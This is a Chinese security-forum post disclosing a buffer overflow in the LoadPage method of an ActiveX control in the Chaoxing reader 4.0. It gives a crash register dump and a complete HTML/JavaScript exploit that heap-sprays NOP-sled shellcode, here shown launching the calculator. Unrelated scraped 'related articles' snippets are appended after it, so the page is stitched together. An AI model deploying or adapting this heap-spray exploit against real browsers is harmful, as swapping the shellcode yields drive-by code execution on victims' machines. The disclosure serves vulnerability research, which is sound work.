文章作者:friddy
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
注:文章首发Friddy的罐子,后由原创作者友情提交到邪恶八进制信息安全团队讨论组,转载请著名首发站点。
本文章只含有漏洞存在的证明,效果是运行计算器的程序,不含有***性代码!
去年11月出的漏洞是在target.Register(ok,buffer)上,这次的缓冲区溢出出在target.LoadPage(buffer ,1 ,1 ,1)
漏洞位置:clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2的LoadPage函数发生缓冲区溢出
漏洞告警: ACCESS_VIOLATION
Disasm: 41414141    ?????    ()

寄存器状态:

EIP 41414141
EAX BAADF000
EBX 00000000
ECX 00000000
EDX 00B36F48 -> 016E9D0C
EDI 0013E084 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESI 0013E39C -> 00000000
EBP 00B36F48 -> 016E9D0C
ESP 0013D85C -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ArgDump:
EBP+8    BAADF00D
EBP+12    00000000
EBP+16    BAADF00D
EBP+20    BAADF00D
EBP+24    BAADF00D
EBP+28    BAADF00D
Stack Dump:
13D85C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
13D86C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
13D87C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
13D88C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
13D89C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
漏洞利用程序:
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" id='target'></object>
<P>Made By Friddy QQ:568623
<P>[url]http://www.friddy.cn[/url]
<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;//总长度
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<300; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 3092) buffer+="\x0a\x0a\x0a\x0a";
target.LoadPage(buffer ,1 ,1 ,1);//这次出问题的是LoadPage.不是Register了
</script>
***exp.rar

超星浏览器4.0漏洞0day Exp相关推荐

  1. HeapSpray+ROP绕过IE8的DEP防护 ——堆喷射技术利用超星老漏洞

    感觉写的太水了,有空一定重新写一份更详细明白的.. 堆喷射技术已经发展很多个年头了,相关的研究也挺多的,虽然现在Win7.Win8系统下的利用越来越难,但是该技术仍然是可用的,比如最近新出的IE8 u ...

  2. 超星阅读器ActiveX缓冲区溢出漏洞利用-LoadPage

    超星阅读器4.0漏洞利用过程: 1.由于是缓冲区溢出,最开始我想到的利用方式"jmp esp" 0---------------------256---------260----- ...

  3. 余承东吐槽苹果续航;微软 IE 浏览器被曝漏洞;React Native 0.61.0 发布 | 极客头条...

    快来收听极客头条音频版吧,智能播报由标贝科技提供技术支持. 「CSDN 极客头条」,是从 CSDN 网站延伸至官方微信公众号的特别栏目,专注于一天业界事报道.风里雨里,我们将每天为朋友们,播报最新鲜有 ...

  4. PageAdmin Cms V2.0 getshell 0day

    黑小子在土司公布了"PageAdmin cms getshell Oday",并给出了一个漏 洞的利用EXP.经过危险漫步在虚拟机里测试,存在漏洞的是PageAdmin Cms的次 ...

  5. 超星系统登录,信息爬取

    超星系统登录,信息爬取 经历过上一年的疫情的大学生,一部分大学生可能对超星有一个深刻的认识,而我写这个项目的想法来自我的导师,做一个可以爬取超星课程学生成绩,可以随机组卷(前提是自己题库里有题),该项 ...

  6. 超星集团武汉研发中心面试题

    超星集团武汉研发中心面试 1. 谈实习经历做了什么 2. 说一下图片的分类 (问题的内容是图片,应该不叫分类,应该说每次传图片给图片一个type) 3. 阿里云存图片的失效时间安全策略 阿里云存储的图 ...

  7. 下 文库 试读_莎莎教您怎么样下载超星全部试读图书

    莎莎教您怎么样下载超星全部试读图书 大家好 , 我叫殷素莎 . 今天莎莎教大家怎么下载超星里面 所有的试读图书 , 其实说起来这个方法没有什么技术含量的 大家打开超星的官方网站 http://book ...

  8. aspcms各版本漏洞0day集合

    admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,pass ...

  9. 计算机网络技术通识试题,超星计算机网络技术章节答案

    参考答案如下 当经济业务只涉及货币资金相互间的收付时,超星一般编制(). 计算机网节答攻击弱竞争者能更大幅度地扩大市场占有率和利润水平.( ) 若强大的竞争对手采用的是无差异性市场策略,络技企业要想打 ...

最新文章

  1. 初识mysql数据字段属性_MySQL数据库~~~~初识、基础数据类型
  2. linux ssh scp 使用跳板机 访问 远程服务器
  3. 使用Postman完成接口测试
  4. 通过句柄找到广告弹窗进程
  5. 130塔式服务器系统,PowerEdge T130塔式服务器怎么样
  6. Android之在ubuntu上过滤多条关键字日志
  7. mysql delette_关于字符串:首字母大写MySQL
  8. js 读取php文件内容为空,PHP 读取文件内容代码(txt,js等)
  9. 【分享-windows文件快速搜索神器】Everything 免费、快速搜索文件/文件夹
  10. mysql 大小写问题
  11. linux查看CPU高速缓存(cache)信息
  12. Flex 4 的ComboBox下拉框滚动条Scroller(VerticalScrollBar)的thumb过小问题的解决
  13. C语言程序100例之C#版-008
  14. win10去掉快捷方式小箭头_win7系统如何去掉和恢复桌面快捷方式上的小箭头
  15. GdPicture.NET SDK Crack,提供多种打印功能
  16. python基_python之地基(一)
  17. 中继 并发量_2E1数字中继网关支持60并发
  18. LeetCode-590. N-ary Tree Postorder Traversal
  19. 汇总!【AI会议倒计时列表】“AI Conference Deadlines”
  20. C++ 工程实践:避免使用虚函数作为库的接口

热门文章

  1. Android开发天气预报自我记录
  2. Java——闰年的判断方法,闰年概念
  3. 关于工业物联网的10个笑话
  4. Java反射 Class类常用方法详解
  5. 【深度学习入门】——亲手实现图像卷积操作
  6. 公寓报修系统(IDEA,SSM,MySQL)
  7. 离梦想最近的时候是什么时候?
  8. 无人值守自动安装——PXE(Preboot eXecution Environment)
  9. 小波变换在信号去噪声中的使用
  10. 如何写一篇科技论文(Luca Oerregrini)